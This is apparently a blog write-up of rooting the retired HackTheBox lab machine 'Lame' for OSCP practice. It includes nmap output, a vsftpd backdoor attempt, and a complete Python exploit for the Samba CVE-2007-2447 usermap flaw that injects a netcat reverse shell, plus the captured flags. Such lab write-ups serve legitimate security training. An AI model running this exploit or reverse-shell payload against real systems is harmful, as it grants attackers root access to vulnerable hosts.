Greetings friends! I was advised by some of my fellow OSCP aspirants to check out some of the retired HackTheBox machines in preparation for starting my PWK course. So I went ahead and coughed up the dough to buy a HTB VIP account, and got to work.

Having been informed that Metasploit use would be restricted in the OSCP exam, I decided to challenge myself to hack each machine without the use of Metasploit, so that I would be better prepared for the test.

I was given this handy guide to OSCP-Like HTB Boxes, and decided to start from the top:

OSCP-Like HTB Boxes

The first box in the Linux list is called “Lame,” and according to the ratings on HTB, it looked fairly easy:

Lame Simplicity

I fired up my Kali VM and got to work…


Enumeration

First I needed to know what services were running on the machine. I used the following nmap command to execute a scan which would run a series of scripts and attempt to detect the version information for the various services, as well as the OS of the host:

nmap -A 10.10.10.3 -oA Lame-Script-Scan

The results included a significant amount of information (I've cropped them a little to focus on the important data):

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 03:43 EDT
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    [...]
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    [...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
    [...]
Host script results:
|_clock-skew: mean: 3h48m37s, deviation: 0s, median: 3h48m37s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-04-19T03:32:30-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
    [...]
Nmap done: 1 IP address (1 host up) scanned in 63.65 seconds

As I've noted before, I've been working through Georgia Weidman's Penetration Testing: A Hands-On Introduction to Hacking, and one of the exploits covered in the book relates to the vsftpd 2.3.4 service running on this machine, so I made a mental note to check that service for vulnerabilities. I also noticed that there are two other services that might be vulnerable: OpenSSH 4.7p1 and Samba smbd 3.0.20.

Prioritizing My Targets

Considering that OpenSSH is the least likely of the three to have any vulnerabilities, I decided to put it lower on my list of target services. I chose to look at the vsFTPd service first, since I already had prior knowledge of a possible exploit for that service. If that didn't pan out, I would aim at the Samba service next.

Exploiting Very Secure FTP

Very Secure FTP (vsFTPd) service had an ironic vulnerability in version 2.3.4 wherein a malicious programmer included a backdoor that would spawn a root shell listening on port 6200. Once the backdoor was discovered, the software was patched and a new version 2.3.4 was released without the backdoor. Testing for the backdoor is a simple matter: it is triggered by adding a smiley face :) to the end of the username when logging in.

root@kali:~# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anon:)
331 Please specify the password.
Password: [invisible]

Once logged in with these credentials, if the service was vulnerable, I should have been able to connect to a newly-opened port 6200 with a root shell.

root@kali:~# nc 10.10.10.3 6200
pwd
whoami
:(

It was clear to me that the attack was unsuccessful. Apparently, this machine was using the patched version of vsFTPd v2.3.4. Time to check the Samba service…

Exploiting Samba

The first thing I did when approaching the Samba service was to check to see if there were any exploits already installed in Kali. I might not be using Metasploit to attack the target, but there's no reason I couldn't use searchsploit to quickly find available exploits.

root@kali:~# searchsploit samba 3.0.20 -w
----------------------------------- --------------------------------------------
Exploit Title                      |  URL
----------------------------------- --------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Userna | https://www.exploit-db.com/exploits/16320
Samba < 3.0.20 - Remote Heap Overf | https://www.exploit-db.com/exploits/7701
----------------------------------- --------------------------------------------
Shellcodes: No Result

Only two results were returned, and the second result in the list only applied to Samba versions prior to 3.0.20 (unless I was mistaken and the < was inclusive). But the first result seemed to target versions between 3.0.20 and 3.0.25rc3, which meant it could work against my target. I looked for more information on the website listed and discovered that this exploit was covered by CVE-2007-2447.

None of the links I checked on the CVE site provided any exploit code or tools, so I went to Google and searched for CVE-2007-2447 exploit -metasploit (including that last bit to avoid results for using Metasploit). In the results, I discovered a blog post that explained the vulnerability and included a link to a GitHub repository where a proof-of-concept (PoC) exploit could be found.

The exploit required Python 2.7 and the pysmb library, so I created a virtual environment and installed all the necessary tools, then created a copy of the script. I opened it up with vi and took a gander. The original code used a payload that I felt was needlessly complex. All I wanted was a simple netcat reverse shell, so I updated the script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
    payload = "nc %s %s -e /bin/sh" % (lhost, lport)
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except:
        print("[+] Payload was sent - check netcat !")

if __name__ == "__main__":
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print(
            "[-] usage: python %s <RHOST> <RPORT> <LHOST> <LPORT>"
            % (sys.argv[0])
        )
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

With my script prepared, the next step was to test it out. First, I needed to set up a netcat listener to catch the reverse shell:

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

With that taken care of, it was time to run the script:

(venv) root@kali:~# python exploit.py 10.10.10.3 139 10.10.14.7 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

With the script executed, I went back to my netcat listener to see if I'd gotten the shell, and sure enough I had!

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.3] 49754

I used the id command to see which account I'd logged into. The response thrilled me:

uid=0(root) gid=0(root)

I was logged in as root! Now it was a simple matter to find the root.txt and user.txt flags. (I added the #> in the following lines to denote which commands I typed.)

#> ls root -l
total 16
drwxr-xr-x 2 root root 4096 May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw------- 1 root root   33 Mar 14  2017 root.txt
-rw-r--r-- 1 root root  118 Apr 19 01:18 vnc.log
#> cat root/root.txt
92caac3be140ef409e45721348a4e9df    <--( root flag )
#> ls home -l
total 16
drwxr-xr-x 2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x 2 makis   makis   4096 Mar 14  2017 makis
drwxr-xr-x 2 service service 4096 Apr 16  2010 service
drwxr-xr-x 3    1001    1001 4096 May  7  2010 user
#> ls home/makis -l
total 4
-rw-r--r-- 1 makis makis 33 Mar 14  2017 user.txt
#> cat home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5    <--( user flag )

Bingo! I had both flags, and I'd rooted the box!

Conclusion

Having successfully rooted my first HTB target, I felt elated. Granted, this was one of the simplest targets on the service, but it feels good to get a win, and this proved to me that my training was paying off.

I'll continue to post write-ups of future HTB challenges, as I work through each machine in the OSCP-Like list. I sincerely hope that these machines will help me prepare for my upcoming PWK course and OSCP certification test. This machine was a fairly simple challenge, and it feels great to say I completed it without using Metasploit! But I know that I'll be facing even tougher challenges in the future.

I'll be sure to share all of my adventures here, of course. So stay tuned!